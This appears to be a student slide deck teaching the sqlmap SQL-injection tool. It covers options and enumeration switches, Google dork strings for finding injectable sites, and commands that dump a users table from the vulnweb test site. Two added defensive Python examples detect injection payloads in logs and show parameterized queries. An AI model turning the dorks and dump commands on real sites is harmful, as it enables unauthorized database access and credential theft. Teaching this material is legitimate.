Sqlmap - By-22011556-105

sqlmap practical screenshots attached

Uploaded by Nasir Ali

sqlmap

By: Alishba Sehar


sqlmap

• It is an open source tool for performing SQL injection in a better and simpler way.
• sqlmap is developed in Python.
• sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.
• It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
sqlmap was developed by

Bernardo Damele A. G. (@inquisb) https://twitter.com/inquisb
Miroslav Stampar (@stamparm) https://twitter.com/stamparm
Features of sqlmap
• It supports various types of database management systems, including:
• MySQL
• Oracle
• PostgreSQL
• Microsoft SQL Server
• Microsoft Access
• IBM DB2
• SQLite
• Firebird
• Sybase
• SAP MaxDB
• HSQLDB
• Informix
Features of sqlmap
• SQL injection techniques:
1. boolean-based blind
2. time-based blind
3. error-based
4. UNION query
5. stacked queries
6. out-of-band
• Enumerate users, password hashes, privileges, roles, databases, tables and columns.
• Cracking passwords using a dictionary-based attack.
• Support to dump database tables entirely.
• Support for database process user privilege escalation via Metasploit's Meterpreter getsystem command.
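The six techniques above are also what a defender sees in web server logs when sqlmap runs against a site. As an added example that is not part of the original slides, this Python triage script decodes request paths from constructed access-log lines, tags each with the technique its payload resembles, and flags sqlmap's default User-Agent (which begins with "sqlmap/" unless the operator overrides it with --user-agent or --random-agent); the log lines and the UA version string are constructed placeholders.

```python
import re
from urllib.parse import unquote_plus

# Coarse indicators for the techniques listed on the slide; meant for log triage, not as a WAF.
TECHNIQUE_PATTERNS = {
    "boolean-based blind": re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I),
    "time-based blind":    re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\b", re.I),
    "error-based":         re.compile(r"\b(extractvalue|updatexml|convert)\s*\(", re.I),
    "UNION query":         re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    "stacked queries":     re.compile(r";\s*(select|insert|update|delete|drop|exec)\b", re.I),
}

# Combined log format: ip - - [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def classify(line):
    """Return (ip, decoded_path, techniques, sqlmap_ua) for one line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m.group("path"))   # payloads arrive URL-encoded
    hits = sorted(name for name, pat in TECHNIQUE_PATTERNS.items() if pat.search(decoded))
    # sqlmap's default User-Agent starts with "sqlmap/"; absent when the operator overrides it
    sqlmap_ua = m.group("ua").lower().startswith("sqlmap/")
    return m.group("ip"), decoded, hits, sqlmap_ua

def suspicious(lines):
    """Lines whose path carries an injection indicator or whose UA is sqlmap's default."""
    out = []
    for line in lines:
        r = classify(line)
        if r and (r[2] or r[3]):
            out.append(r)
    return out

# Constructed sample lines (not real traffic); "1.x" is a version placeholder.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /listproducts.php?cat=1%20AND%201%3D2 HTTP/1.1" 200 300 "-" "sqlmap/1.x (https://sqlmap.org)"',
    '203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /listproducts.php?cat=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "GET /listproducts.php?cat=1%20UNION%20ALL%20SELECT%20NULL,NULL HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, techs, ua in suspicious(SAMPLE_LOG):
        print(ip, path, techs, "sqlmap-UA" if ua else "")
```

The first line (a normal cat=1 request) is not reported; the other three are, one per technique.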
Options
• These options can be used to customize the detection phase:
• --crawl=CRAWL      Crawl the website starting from the target URL
• --batch            Run in batch mode without user interaction (the default answer is taken for every prompt)
• --threads=THREADS  Number of threads to use in operations (1-10, default 1)
• --risk=RISK        Risk of tests to perform (1-3, default 1)
• --level=LEVEL      Level of tests to perform (1-5, default 1)
• -v VERBOSITY       Verbosity level of output (0-6, default 1)
• --tamper=TAMPER    Use tamper scripts to encode the payloads
Crawl
• Depth 1: http://www.example.com/news
• Depth 2: http://www.example.com/news/newest/
• Depth 3: http://www.example.com/news/newest/terror/
• Depth 4: http://www.example.com/news/newest/terror/country/

--crawl=2 limits the crawl to depth 2, so only the first two URLs above would be visited.
Verbosity
• 0: Show only Python tracebacks, error and critical messages.
• 1: Also show information and warning messages.
• 2: Also show debug messages.
• 3: Also show injected payloads.
• 4: Also show HTTP requests.
• 5: Also show HTTP response headers.
• 6: Also show HTTP responses' page content.
Extracting Information With Sqlmap
Recover the session user:                                           --current-user
Detect the current database:                                        --current-db
Find out if the session user is a database administrator:           --is-dba
List database system users:                                         --users
List databases:                                                     --dbs
DBMS server hostname:                                               --hostname
DBMS exact version, OS information, architecture and patch level:   -f
Extracting Information With Sqlmap
List the DBMS users:                                                --users
List all DBMS users' password hashes:                               --passwords
List users' privileges:                                             --privileges
List all columns, or just those of a specific table in a database:  --columns (-T <table name> -D <database>)
Execute a custom SQL query:                                         --sql-query="<sql query to execute>"
SQL shell to execute all your custom SQL queries:                   --sql-shell
Extracting Information With Sqlmap
DBMS database to enumerate:                   -D <database_name>
DBMS database table(s) to enumerate:          -T <table_name>
DBMS database table column(s) to enumerate:   -C <column_name>
Dump DBMS database table entries:             --dump
Dump all DBMS databases' table entries:       --dump-all
Enumerate DBMS database tables:               --tables
Enumerate DBMS users' roles:                  --roles
Extracting Information With Sqlmap
Retrieve the DBMS banner:     -b, --banner
Enumerate the DBMS schema:    --schema
Retrieve DBMS comments:       --comments
sqlmap: workflow
• Find a vulnerable website
 • Google dork strings to find SQL-injectable websites for sqlmap:
 • inurl:product-item.php?id=
 • inurl:news.php?catid=
 • inurl:index.php?id=
 • inurl:title.php?id=
• Identify possible injection points
• Identify SQLi vulnerabilities:
 • By using sqlmap
 • Manual testing
• Exploit SQLi vulnerabilities


Requirement
• Kali Linux installed
• sqlmap installed
List DBMS databases using sqlmap SQL injection
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

List tables of the target database using sqlmap SQL injection
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

List columns of the target table in the selected database using sqlmap SQL injection
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

List user and password from the target columns of the target table in the selected database using sqlmap SQL injection
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --dump
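The four commands above walk from database to table to column to dump, all through the single cat parameter. As an added example that is not part of the original slides, the Python below uses an in-memory SQLite table as a constructed stand-in for the listproducts page (the real site's schema is not assumed) to show the string-concatenation pattern that makes such a parameter injectable, the boolean-based blind check sqlmap applies to it, and the validated, parameterized form that removes the response difference sqlmap relies on.

```python
import sqlite3

# Constructed stand-in for listproducts.php?cat=1: a small in-memory products table.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)",
                   [(1, 1, "lamp"), (2, 1, "chair"), (3, 2, "desk")])
    return db

def list_products_vulnerable(db, cat):
    """The injectable pattern: the request parameter is concatenated into the SQL text."""
    sql = "SELECT name FROM products WHERE cat = " + cat
    return [row[0] for row in db.execute(sql)]

def list_products_safe(db, cat):
    """Hardened form: validate the expected type, then bind the value as a parameter."""
    if not cat.isdigit():          # cat is an integer id; anything else is rejected
        raise ValueError("cat must be a positive integer")
    return [row[0] for row in db.execute(
        "SELECT name FROM products WHERE cat = ?", (int(cat),))]

def boolean_blind_differs(handler, db):
    """sqlmap's boolean-based blind test: do a true and a false condition appended
    to the parameter yield different pages? True means the handler is injectable."""
    try:
        page_true = handler(db, "1 AND 1=1")
        page_false = handler(db, "1 AND 1=2")
    except ValueError:
        return False               # input rejected before reaching SQL: nothing to compare
    return page_true != page_false

if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler injectable:", boolean_blind_differs(list_products_vulnerable, db))
    print("safe handler injectable:      ", boolean_blind_differs(list_products_safe, db))
```

With the concatenating handler the true condition returns both category-1 rows and the false one returns none, which is exactly the difference sqlmap's --dbs run above builds on; the parameterized handler gives it nothing to distinguish.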
References
http://www.sqlinjection.net/sqlmap/tutorial/

http://niiconsulting.com/checkmate/2014/01/from-sql-injection-to-0wnage-using-sqlmap/

https://github.com/sqlmapproject/sqlmap/wiki/Usage
Thank you
